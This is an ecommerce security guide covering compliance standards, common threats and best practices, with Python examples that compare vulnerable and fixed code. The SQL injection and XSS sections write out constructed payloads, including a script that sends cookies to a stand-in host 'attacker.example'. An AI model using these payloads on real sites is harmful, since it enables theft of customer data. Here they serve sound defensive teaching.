Ecommerce sites will always be a hot target for cyberattacks. For would-be thieves, they are treasure troves of personal and financial data. In addition to this, for businesses of all sizes, the cost of a breach both in loss of data and in customer trust can be hugely damaging.
Ecommerce business owners are all too aware of these issues and are increasing their security measures. The VMWare Carbon Black 2020 Cybersecurity Outlook Report found that 77% of businesses surveyed had purchased new security products in the last year and 69% had increased security staff.
In this constant game of cat and mouse, as online retailers add increasingly innovative technologies to their sites to stay competitive, cyber attackers are equally honing their skills and finding new vulnerabilities to exploit. The best way to stay ahead is to be aware of ecommerce security best practices and the types of attacks to be on the lookout for.
What is Ecommerce Security?
The frequency and sophistication of cyber-attacks have skyrocketed in recent years. Ecommerce security refers to the measures taken to protect your business and your customers against cyber threats.
1. Payment Card Industry Data Security Standard (PCI DSS).
PCI DSS (often referred to as just “PCI”) is an industry standard that sets requirements for how cardholder data is stored, processed, and transmitted by any organisation that handles it. Compliance is assessed against a defined set of controls; it raises the baseline, but it does not by itself guarantee that a site is secure.
2. International Organisation for Standardisation (ISO).
ISO is an international standard-setting body that publishes requirements and guidance to help organisations make sure their products and processes are fit for purpose. One of its standards, ISO/IEC 27001:2013, specifies the requirements for an information security management system (ISMS). Certification means an independent auditor has confirmed that the business has a systematic, documented approach to identifying, treating, and monitoring information security risk, with standardised practices to match.
3. Personal Data.
Personal data or personal information refers to any data that can be linked back to a specific individual. At its most simple, this includes names, email addresses, and phone numbers, but it can get a little bit more complex as well. Any data set — even scrubbed of specific names or numbers — that can identify a particular person is considered personal data. Protecting personal data is particularly important when it comes to data privacy regulations like GDPR (more on that later).
4. Transport Layer Security (TLS), Secure Sockets Layer (SSL), and HTTPS authentication.
TLS (the successor to SSL, whose name survives mainly in the phrase “SSL certificate”) authenticates the server to the browser and encrypts the traffic between them. Once you have a certificate for your domain, you can move from HTTP to HTTPS, which assures shoppers that their connection is encrypted and that they are really talking to your site. It does not mean the site itself is free of vulnerabilities, so treat it as a baseline rather than a badge of overall security.
5. Multi-factor authentication (MFA), 2-factor authentication (2FA), or 2-step verification (2SV).
MFA, 2FA, and 2SV are sometimes used interchangeably, and they are similar, but there are differences between them. Authentication factors fall into three categories: something you know (a password or PIN), something you have (a phone, an authenticator app, or a hardware key), and something you are (a fingerprint or face). In addition to entering a username and password, all three methods require at least one further verification step from a user logging into a site like your ecommerce store.
Here’s a high-level explanation of the differences:
- 2SV requires two steps, which may draw on the same category of factor. Typically the user enters a one-time code delivered via email, text message, or phone call after the password
- 2FA requires two different categories of factor, for example a password plus approving the login in an authenticator app on a phone, or tapping a hardware security key, while logging in from a laptop
- MFA is the general term for two or more factors; 2FA is the special case with exactly two. Codes sent by SMS or email are the weakest second factor, since they can be phished, intercepted, or redirected through SIM swapping; app-generated codes and hardware keys resist these attacks better
6. Distributed Denial of Service (DDoS).
A DDoS attack disrupts a server, service, or network by overwhelming it with a flood of traffic, usually sent from a botnet of compromised machines. This resource on Cloudflare, which offers more detailed information on DDoS attacks, compares it to a traffic jam. Imagine a major roadway during rush hour: your customers and legitimate traffic are the cars trying to reach your store, and the flood of attack traffic is the jam that blocks them out.
7. Malware and ransomware.
Malware, or “malicious software”, is software that attackers run on your systems without authorisation. Ransomware is a type of malware that locks the victim out of their system or encrypts their data until a ransom is paid to the attacker. Here are a few symptoms you may experience on a workstation if it becomes infected:
- Links take you to the wrong page destination
- New toolbars or buttons appear in your browser, or new icons show up on your desktop
- You experience a near-constant barrage of ad pop-ups
- Your system is slow or repeatedly crashes, or your browser freezes frequently and becomes unresponsive
- Your emails keep bouncing
On an ecommerce server the signs are subtler: unexpected files in the web root, modified checkout scripts, admin accounts nobody created, or outbound connections to unfamiliar hosts.
What is Compliance, and How is it Different From Security?
The concepts of compliance and cybersecurity are often used interchangeably — and in some ways, they are related, but there are some important differences.
Compliance refers to the ability to meet a specific set of standards set out by governments or private institutions, and there can be legal repercussions for not complying. However, meeting those compliance standards does not necessarily mean your ecommerce site is fully secure. Note that there are many compliance standards that your business may be required to meet. We are only discussing several of the major, cybersecurity-related regulations.
1. Payment Card Industry Data Security Standard (PCI-DSS).
Any business that accepts, processes, stores, or transmits credit card data must comply with the PCI-DSS requirements around the protection of cardholder data, no matter its revenue or transaction volume; volume determines only how rigorously compliance is validated, from a self-assessment questionnaire for small merchants to an on-site assessment for the largest. The standard is defined by the PCI Security Standards Council (PCI SSC) and enforced by the card brands and acquiring banks through their merchant agreements.
2. General Data Protection Regulation (GDPR).
GDPR is a relatively recent law (in force since May 2018) enacted in the European Union to protect the personal data and privacy of individuals in the EU and the wider European Economic Area (EEA), whatever their citizenship. It doesn’t just apply to businesses in the EU; if you sell to people located there, you will need to comply with GDPR as you handle any of their data.
3. California Consumer Privacy Act (CCPA).
After GDPR was implemented in the EU, the state of California began to move toward implementing its data protection law. The deadline for businesses working with or employing California residents to comply with CCPA was January 1, 2020. The spirit of CCPA is similar to GDPR in that it is dedicated to protecting the data and privacy of private citizens, but there are a few important differences. While this is the most recent and farthest-reaching data protection standard in the US, at least 15 other states have some type of personal privacy or data protection standards.
The Biggest Security Threats to Your Ecommerce Site
The types and methods of cyber attacks are broad and varied, and it would be almost impossible to delve into them all in one blog post. But some rise to the top as the most important to know about for strong ecommerce security.
1. Phishing.
Phishing is a type of social engineering and refers to methods used by attackers to trick victims — typically via email, text, or phone — into providing private information like passwords, account numbers, social security numbers, and more.
2. Malware and ransomware.
When your device or network becomes infected with malware or ransomware, you may be locked out of all your important data and systems. Downtime is expensive, but regular backups of your site data can keep this from being a devastating blow to your business, provided the backups themselves are out of the attacker’s reach. Not clicking suspicious links or installing unknown software reduces your exposure, but it is no substitute for keeping systems patched, since much malware spreads through unpatched vulnerabilities rather than user mistakes.
3. SQL injection.
You may be at risk if any part of your ecommerce site builds SQL queries by pasting user-supplied input (a search term, an email address, an order ID) directly into the query text. If that input is not handled safely, an attacker can close off the intended query and append their own, letting them read, modify, or delete any information the database account can reach, including customer records and staff credentials. The standard defence is parameterised queries, which keep the data separate from the SQL the database parses.
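The following is an added example, not code from the original article, showing the vulnerable and the parameterised form of a customer lookup side by side against a constructed SQLite database. The table names, rows, and the two attacker inputs are all made up for the demonstration.

```python
import sqlite3


def make_store_db() -> sqlite3.Connection:
    """Constructed sample database standing in for a store's backend."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE customers (id INTEGER PRIMARY KEY, email TEXT, card_last4 TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
    """)
    conn.executemany("INSERT INTO customers (email, card_last4) VALUES (?, ?)", [
        ("alice@example.com", "4242"),
        ("bob@example.com", "1881"),
        ("carol@example.com", "0005"),
    ])
    # The hash is a constructed placeholder string, not a real bcrypt output.
    conn.execute("INSERT INTO users (username, password_hash) VALUES (?, ?)",
                 ("admin", "$2b$12$constructed.placeholder.hash"))
    return conn


def find_customer_vulnerable(conn: sqlite3.Connection, email: str) -> list:
    # String concatenation: whatever the user typed becomes part of the SQL text.
    sql = "SELECT email, card_last4 FROM customers WHERE email = '" + email + "'"
    return conn.execute(sql).fetchall()


def find_customer_safe(conn: sqlite3.Connection, email: str) -> list:
    # Parameterised query: the value is bound separately and is never parsed as SQL,
    # so an injection string is just an email address that matches nobody.
    return conn.execute(
        "SELECT email, card_last4 FROM customers WHERE email = ?", (email,)
    ).fetchall()


# Two constructed attacker inputs. The first makes the WHERE clause always true and dumps
# every customer; the second pulls rows from an unrelated table with UNION and uses a
# SQL comment (--) to discard the closing quote the application appends.
DUMP_ALL = "' OR '1'='1"
DUMP_USERS = "' UNION SELECT username, password_hash FROM users --"


if __name__ == "__main__":
    db = make_store_db()
    print("vulnerable, OR 1=1 :", find_customer_vulnerable(db, DUMP_ALL))
    print("vulnerable, UNION  :", find_customer_vulnerable(db, DUMP_USERS))
    print("parameterised      :", find_customer_safe(db, DUMP_ALL))
```

The UNION case is the one to remember: the vulnerable query only ever intended to touch `customers`, yet the attacker reads `users`. Parameterisation fixes the query; the database account should also be limited to the tables the storefront actually needs, so a bug elsewhere cannot reach credentials at all.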
4. Cross-site scripting (XSS).
XSS involves getting a piece of malicious code (typically JavaScript) to run in a webpage in your site’s origin, usually by storing it in a field the site later displays without escaping, such as a product review or a customer name. The code runs in your shoppers’ browsers with their logged-in session, so it can steal session cookies or tokens, alter what the page shows, redirect them to phishing pages, or silently place orders and change account details on their behalf. The core fix is to escape every piece of untrusted data for the context in which it is output, backed by a Content Security Policy as a second line of defence.
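As an added example (not code from the original article), here is the difference between dropping untrusted text into a page and escaping it, for the two contexts that matter most in a storefront: HTML body text (a product review) and a quoted attribute (a customer’s name echoed back into a form). Both payloads are constructed. Python’s own `html.parser` is used as a stand-in for the browser to show which tags and attributes actually end up live.

```python
import html
from html.parser import HTMLParser

# Constructed attacker inputs: one aimed at an HTML text context, one at an attribute.
REVIEW_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>Great shoes!'
NAME_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def render_review_vulnerable(review: str) -> str:
    # Untrusted text dropped straight into the page: the <script> tag is live.
    return '<p class="review">' + review + '</p>'


def render_review_safe(review: str) -> str:
    # Escape for HTML text context: < > & become entities and stay visible text.
    return '<p class="review">' + html.escape(review) + '</p>'


def render_name_field_vulnerable(name: str) -> str:
    # Untrusted text inside a quoted attribute: a stray " lets the attacker add attributes.
    return '<input name="customer" value="' + name + '">'


def render_name_field_safe(name: str) -> str:
    # quote=True (the default) also escapes " and ' so the value cannot close the attribute.
    return '<input name="customer" value="' + html.escape(name, quote=True) + '">'


class _Inspector(HTMLParser):
    """Parses a fragment the way a browser would and records what became executable."""
    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.input_attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        elif tag == "input":
            self.input_attrs = dict(attrs)  # attribute values arrive already unescaped


def inspect(fragment: str):
    """Return (number of live <script> tags, attributes of the <input> element)."""
    parser = _Inspector()
    parser.feed(fragment)
    parser.close()
    return parser.script_tags, parser.input_attrs


if __name__ == "__main__":
    print(inspect(render_review_vulnerable(REVIEW_PAYLOAD)))   # one live <script>
    print(inspect(render_review_safe(REVIEW_PAYLOAD)))         # none
    print(inspect(render_name_field_vulnerable(NAME_PAYLOAD))) # gains an onfocus handler
    print(inspect(render_name_field_safe(NAME_PAYLOAD)))       # value is just a string
```

`html.escape` is only correct for HTML text and quoted attributes. Data placed inside a JavaScript string, a URL, or a style block needs that context’s encoder, which is why a templating engine with auto-escaping enabled is the practical default; hand-concatenated HTML like the vulnerable functions above is where XSS keeps reappearing.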
5. E-skimming.
E-skimming (also called a Magecart-style attack, after the groups that popularised it) is a method of stealing credit card information and personal data from the payment pages of ecommerce sites. Attackers gain the ability to change what the checkout page loads, whether via a successful phishing attempt, a brute-forced admin account, an XSS or platform vulnerability, or by compromising a third-party script the page already includes, and add JavaScript that captures the payment details your shoppers type and sends them to a server the attackers control. Because the skimmer runs in the shopper’s browser, HTTPS does nothing to stop it, and the order still completes normally, so the theft can go unnoticed for months.
Best Practices for Ecommerce Security
The compliance standards mentioned above aren’t going away. Trends in privacy concerns indicate that we should expect more regulations in the future as people of all ages are increasingly concerned with where their data is going.
Payment information remains the prime target: as point-of-sale breaches and physical card skimmers have declined overall, attacks have shifted to online checkouts. If a security breach of your ecommerce site leads to a loss of customer data, the associated fines, along with the hit to your brand reputation, could be devastating.
1. Implement strong, unique passwords — and help make sure your customers do, too.
According to the 2020 Verizon Data Breach Investigations Report, 37% of breaches involved stolen or weak credentials. It’s worth the extra effort to make sure you, your employees, and your customers follow good practices for passwords:
- Length matters more than mixed character classes: require at least eight characters, encourage much longer passphrases, and reject passwords that appear on lists of common or previously breached passwords
- Passwords should never be shared — each user should have his or her own unique, private username and password for login
- Never use the same password for other login credentials as you use for your ecommerce site.
- Consider using a password manager
- Never publicly share sensitive information like your date of birth, social security number, or any other info you may use as answers to security questions
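The list above describes the policy; the following added example (written for this page, not taken from the original article) shows what enforcing it at sign-up looks like, together with the other half of password handling the list implies: storing a salted, slow hash rather than the password itself. The denylist is a deliberately tiny constructed stand-in for a real breached-password corpus, and the 600,000-iteration PBKDF2 parameter follows current OWASP guidance.

```python
import hashlib
import hmac
import os
import re

MIN_LENGTH = 8

# Constructed, deliberately tiny denylist. In production screen candidates against a
# large breached-password corpus instead of enforcing character-class rules.
COMMON_PASSWORDS = {"password", "123456", "12345678", "qwerty", "iloveyou",
                    "letmein", "welcome", "admin", "summer", "shopping"}

PBKDF2_ITERATIONS = 600_000  # OWASP recommendation for PBKDF2-HMAC-SHA256


def password_problems(password: str, username: str = "", email: str = "") -> list:
    """Return the reasons a candidate password should be rejected (empty list = accept)."""
    problems = []
    lowered = password.lower()
    if len(password) < MIN_LENGTH:
        problems.append("too_short")
    # Strip trailing digits/symbols so "Welcome2020!" is caught as a variant of "welcome".
    core = re.sub(r"[\d\W_]+$", "", lowered)
    if lowered in COMMON_PASSWORDS or core in COMMON_PASSWORDS:
        problems.append("common")
    identities = [username] + ([email.split("@")[0]] if email else [])
    if any(i and len(i) >= 3 and i.lower() in lowered for i in identities):
        problems.append("contains_identity")
    if len(set(lowered)) <= 2:
        problems.append("repetitive")
    return problems


def hash_password(password: str) -> str:
    """Salted PBKDF2-HMAC-SHA256; the stored string carries everything needed to verify."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    for candidate in ["Welcome2020!", "alice2020!", "correct horse battery staple"]:
        print(candidate, "->", password_problems(candidate, username="alice") or "ok")
    record = hash_password("correct horse battery staple")
    print(verify_password("correct horse battery staple", record))
```

Storing the iteration count alongside the hash is what lets you raise it later without forcing every customer to reset: old records keep verifying with their recorded cost until the user next logs in, at which point you can re-hash.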
2. Protect your devices.
Whether you’ve got one computer in a home office or a headquarters with a full networked computer system, make sure your connected devices are cyber-secure with antivirus software, firewalls, or another appropriate method of protecting against threats.
3. Steel against social engineering attempts.
One of the best ways to avoid malware infections is to avoid falling into the phishing traps. Never provide any level of personal information unless you have verified the identity of the recipient. Additionally, no legitimate organisation will ever ask you to share your password.
Never click links in suspicious emails, as they may take you to a webpage that is made to look like a familiar login page but serves instead to steal your information. Also, do not ever download any attachments that you were not already expecting.
There are a few ways to distinguish phishing attempts from legitimate emails; here’s what to look for:
- Obvious spelling and grammatical mistakes in the subject line or body of an email could indicate a suspicious sender
- Look closely at the domain of the email sender. They are often made to look like a familiar domain but are off by just one letter (e.g., SwiftERM.com could become SwiftEERM.com)
- The same goes for any URLs you might click. At first glance, they may appear legitimate, but the spelling could be off by one letter in the hopes you don’t notice and click anyway, through to a dangerous domain
- Suspicious emails may ask you to do something like transfer money or authorise a charge, and offer an excuse for why it must be done immediately
4. Implement additional authentication factors.
It may feel like a burden at times, but using 2-step verification, 2-factor authentication, or multi-factor authentication gives you further assurance that you and your authorised users are the only people logging into your store. Considering the potential consequences of a breach, it’s worth it.
5. Only store the customer data that you need.
When it comes to storing data, the bottom line is to never hold on to more than you need to optimally conduct your business. However, in deciding what exactly that means for you, there are a lot of factors to consider.
Particularly with the growing number of data privacy regulations, it’s important to carefully establish your own business philosophy to balance customer experience, business convenience, and security.
Always keep your customers’ critical data separate from other information by segmenting your network. Deploy firewalls and conduct audits to ensure that all of your security measures are functioning the way they are supposed to.
6. Make sure your site is always up to date.
Security is a continuous cat-and-mouse game. Attackers identify vulnerabilities; software engineers patch them. If you are using a SaaS ecommerce platform, updates to the core platform are taken care of automatically, though any custom code, themes, and third-party apps you add remain your responsibility. With on-premises ecommerce solutions, your business is responsible for implementing every update, bug fix, and vulnerability patch to the software that powers your store, including the web server, database, and operating system underneath it.
With our previous ecommerce platform, there were ongoing security updates that we had to manually install which would always “break” something else. We had to create a secondary sandbox site to test security updates before uploading to our live site. As you can imagine, this was not ideal.
7. Switch to HTTPS.
Secure HTTPS hosting, which requires a TLS certificate (still widely called an SSL certificate), protects your shoppers’ traffic from interception and tampering. It’s also a boon for your marketing department: Google treats HTTPS as a ranking signal, and Chrome labels plain HTTP pages “Not secure”. Redirect every HTTP request to HTTPS and enable HTTP Strict Transport Security (HSTS) so that browsers never fall back to HTTP. HTTPS sends a positive trust signal to your shoppers, particularly the digitally savvy.
8. Back up your data.
If you are breached and lose access to your data, you are going to want a backup to help you get your business back up and running as quickly as possible. Keep at least one copy offline or in immutable storage so that ransomware cannot encrypt it along with the live systems, and test restores regularly; a backup that has never been restored is an assumption, not a recovery plan.
9. Regularly review all plugins and third-party integrations.
Take an inventory of all the third-party solutions you’re running within your store, including every external script loaded on your checkout page. Make sure that you know what each one is, what data it can access, and whether you still trust that third party. If you’re no longer using it, remove the integration from your store. The idea is to allow the smallest number of parties to have access to your customers’ data while still driving your business forward.
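The inventory step above, and the e-skimming threat described earlier, both come down to knowing exactly which scripts your checkout page runs. This added example (not code from the original article) parses a constructed checkout page and flags scripts from origins you have not approved, approved third-party scripts that lack a Subresource Integrity (`integrity`) attribute, and inline scripts. The store origin, vendor hostnames, and the integrity value are placeholders invented for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumptions for the example: our own store origin and the vendors we have vetted.
SITE_ORIGIN = "https://shop.example"
APPROVED_ORIGINS = {"https://js.payments.example"}

# Constructed checkout page. Hostnames and the integrity value are placeholders.
CHECKOUT_HTML = """
<html><head>
  <script src="/static/checkout.js"></script>
  <script src="https://js.payments.example/v3/sdk.js"
          integrity="sha384-PLACEHOLDERhashOfTheVettedFile" crossorigin="anonymous"></script>
  <script src="https://js.payments.example/v3/extra.js"></script>
  <script src="https://cdn-analytics.example/track.js"></script>
  <script>window.shopConfig = {currency: "GBP"};</script>
</head><body><form id="checkout"></form></body></html>
"""


class ScriptCollector(HTMLParser):
    """Record every <script> tag's src and integrity attribute."""
    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self.scripts.append((a.get("src"), a.get("integrity")))


def audit_checkout_scripts(page_html: str, site_origin: str = SITE_ORIGIN,
                           approved: set = APPROVED_ORIGINS) -> list:
    """Return (src, reason) findings for scripts that need a human to look at them."""
    collector = ScriptCollector()
    collector.feed(page_html)
    collector.close()
    findings = []
    for src, integrity in collector.scripts:
        if src is None:
            findings.append(("<inline>", "inline script: confirm it is yours or block it with CSP"))
            continue
        parsed = urlparse(src)
        if not parsed.netloc:
            continue  # relative path: served from our own origin
        origin = f"{parsed.scheme}://{parsed.netloc}"
        if origin == site_origin:
            continue
        if origin not in approved:
            findings.append((src, "unapproved third-party origin"))
        elif not integrity:
            findings.append((src, "approved origin but no integrity attribute"))
    return findings


if __name__ == "__main__":
    for src, reason in audit_checkout_scripts(CHECKOUT_HTML):
        print(f"{reason}: {src}")
```

Run it against the live checkout page on a schedule and alert on any new finding; a skimmer added to a vendor’s CDN or a fresh tag injected by a compromised plugin shows up as a diff. Two caveats: SRI only works when you pin a specific file version (a vendor that updates the file in place will break the hash), and first-party files such as `/static/checkout.js` pass this check even if an attacker has modified them, so pair it with file-integrity monitoring of your own assets and a Content Security Policy that names the allowed script origins.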
Double Down on Security During the Holiday Season
The holiday season is, unfortunately, a time when you can expect higher volumes of attempted fraud and cybercrime. Everyone is busy, and there are huge spikes in traffic on ecommerce sites, making anomalous behaviour more difficult to detect. Attackers know this, and see it as an opportunity.
Here are some things you can do to ensure website security through the holidays:
1. Do a pre-holiday security check.
The holiday season is a peak period for ecommerce cyber-attacks, which take advantage of the holiday rush. Retailers should prepare for this in advance and conduct a thorough security check before the season starts. This should include checking for malware in point-of-sale systems, reviewing every script your checkout page loads, and hardening your web servers.
Your holiday security audit should also include an examination of who has access to what:
Make sure to review admin-level accounts and privileges for your store, marketing software, and other tools. Disable or delete unused accounts. Update permissions to reflect the actual workflows for particular users.
2. Increase your fraud protection.
A steep spike in shoppers is often accompanied by an increase in fraudulent activity. According to the TransUnion Holiday Retail Fraud Survey from 2019, 46% of customers are concerned about being the victim of fraud when shopping this holiday season.
Another form of cyber risk, and one of the biggest facing ecommerce brands today, is the chargeback scam. Attackers acquire stolen credit card details along with account credentials and go on a spending spree. The retailer receives an order and ships it without thinking twice, only to receive a chargeback weeks later when the real cardholder reports the charge as fraud. The retailer usually cannot contest it, is forced to refund the payment, and the goods are long gone. The problem is compounded further when loyalty points and gift cards are involved.
3. Prepare your customer service team.
Make sure you and your team are prepared for common threats — including having a clear process for verifying the identity of customers who request any changes to their orders or accounts.
4. Have a security update plan.
It’s good advice to get your store pretty much locked down for the holidays and not make too many changes to it, to avoid the extra risk that changes entail. That general guideline does not apply to security: a vulnerability that needs patching should still be patched, and promptly. This is mostly applicable if you have an on-premises ecommerce solution. You need a tried and tested plan for applying updates if they become necessary (a staging copy of the site to test on, a rollback path, and someone on call) to ensure the security of your business and your shoppers.
Conclusion
Developing good ecommerce security is vitally important to the success of your business. You can’t afford to lose your customers’ trust by exposing their data. By using a SaaS platform, you get the benefits of spending more time growing your business — and less time worrying about security monitoring and maintenance.
This doesn’t mean there’s nothing for you to do! Practising good password hygiene, staying mindful about clicking links and downloading attachments from your email, and regularly reviewing your third-party integrations are particularly important.
By following the tips in this post and staying aware of what’s happening in the cybersecurity landscape, you can provide your customers with a shopping experience they can trust.